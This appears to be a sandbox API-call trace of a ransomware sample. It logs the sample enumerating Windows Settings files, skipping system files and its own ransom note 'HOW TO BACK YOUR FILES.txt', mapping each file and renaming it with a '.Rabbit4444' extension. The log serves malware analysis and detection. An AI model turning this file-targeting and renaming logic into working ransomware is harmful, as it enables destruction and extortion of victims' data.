[0058.469] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14977966964) returned 1 [0058.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.469] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.469] CloseHandle (hObject=0x298) returned 1 [0058.469] CloseHandle (hObject=0x278) returned 1 [0058.469] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms.Rabbit4444") returned 192 [0058.469] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{207d6bd2-a09b-406f-8a72-bc90c49fc152}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{207d6bd2-a09b-406f-8a72-bc90c49fc152}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.470] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46551ab2, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x46551ab2, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x220f9a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", cAlternateFileName="CL26FE~1.SET")) returned 1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2=".") returned 1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2="..") returned 1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2="windows") returned -1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2="boot") returned 1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.481] lstrcmpiW (lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.481] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms" | out: lpString1="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms") returned="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms" [0058.481] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.481] lstrlenW (lpString="Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms") returned 64 [0058.481] lstrlenW (lpString="Rabbit4444") returned 10 [0058.481] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.481] lstrlenW (lpString=".dll") returned 4 [0058.481] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.481] lstrlenW (lpString=".lnk") returned 4 [0058.482] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.482] lstrlenW (lpString=".ini") returned 4 [0058.482] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.482] lstrlenW (lpString=".sys") returned 4 [0058.482] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.482] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{21a5437e-d266-4f56-a146-06744a8bc071}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.482] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.482] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14979274221) returned 1 [0058.482] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1168) returned 1 [0058.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0058.482] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0058.483] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0058.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.484] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.484] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14979514349) returned 1 [0058.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0058.485] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.485] CloseHandle (hObject=0x298) returned 1 [0058.485] CloseHandle (hObject=0x278) returned 1 [0058.485] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms.Rabbit4444") returned 192 [0058.485] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{21a5437e-d266-4f56-a146-06744a8bc071}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{21a5437e-d266-4f56-a146-06744a8bc071}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.485] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46872bcd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x46872bcd, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x491, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", cAlternateFileName="CL589B~1.SET")) returned 1 [0058.485] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.485] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.485] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.486] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2=".") returned 1 [0058.486] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2="..") returned 1 [0058.486] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2="windows") returned -1 [0058.486] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.486] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.486] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2="boot") returned 1 [0058.486] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.486] lstrcmpiW (lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.486] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms" | out: lpString1="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms") returned="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms" [0058.486] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.487] lstrlenW (lpString="Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms") returned 64 [0058.487] lstrlenW (lpString="Rabbit4444") returned 10 [0058.487] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.487] lstrlenW (lpString=".dll") returned 4 [0058.487] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.487] lstrlenW (lpString=".lnk") returned 4 [0058.487] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.487] lstrlenW (lpString=".ini") returned 4 [0058.487] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.487] lstrlenW (lpString=".sys") returned 4 [0058.487] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.487] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{232a1851-808c-4b44-a92a-38e862989ce5}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.487] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.487] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14979800286) returned 1 [0058.487] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1169) returned 1 [0058.487] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.487] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.487] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0058.490] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0058.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.491] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14980222410) returned 1 [0058.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.492] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.492] CloseHandle (hObject=0x298) returned 1 [0058.492] CloseHandle (hObject=0x278) returned 1 [0058.492] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms.Rabbit4444") returned 192 [0058.492] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{232a1851-808c-4b44-a92a-38e862989ce5}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{232a1851-808c-4b44-a92a-38e862989ce5}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.493] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x478d6f2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x478d6f2f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2216c19d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", cAlternateFileName="CLB8B3~1.SET")) returned 1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2=".") returned 1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2="..") returned 1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2="windows") returned -1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2="boot") returned 1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.493] lstrcmpiW (lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.493] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms" | out: lpString1="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms") returned="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms" [0058.493] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.493] lstrlenW (lpString="Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms") returned 64 [0058.493] lstrlenW (lpString="Rabbit4444") returned 10 [0058.493] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.493] lstrlenW (lpString=".dll") returned 4 [0058.493] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.493] lstrlenW (lpString=".lnk") returned 4 [0058.493] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.493] lstrlenW (lpString=".ini") returned 4 [0058.494] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.494] lstrlenW (lpString=".sys") returned 4 [0058.494] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.494] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{29b87534-19a8-4a39-aa81-2148e7de5894}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.494] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.494] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14980466707) returned 1 [0058.494] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1214) returned 1 [0058.494] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.494] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0058.494] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0058.495] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0058.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.496] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.496] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14980713517) returned 1 [0058.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0058.496] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.497] CloseHandle (hObject=0x298) returned 1 [0058.497] CloseHandle (hObject=0x278) returned 1 [0058.497] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms.Rabbit4444") returned 192 [0058.497] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{29b87534-19a8-4a39-aa81-2148e7de5894}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{29b87534-19a8-4a39-aa81-2148e7de5894}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.498] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47a2e45b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x47a2e45b, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224ffa05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", cAlternateFileName="CL59E5~1.SET")) returned 1 [0058.498] lstrcmpiW (lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.498] lstrcmpiW (lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.498] lstrcmpiW (lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.498] lstrcmpiW (lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2=".") returned 1 [0058.498] lstrcmpiW (lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2="..") returned 1 [0058.498] lstrcmpiW (lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2="windows") returned -1 [0058.498] lstrcmpiW (lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.498] lstrcmpiW (lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.498] lstrcmpiW (lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2="boot") returned 1 [0058.498] lstrcmpiW 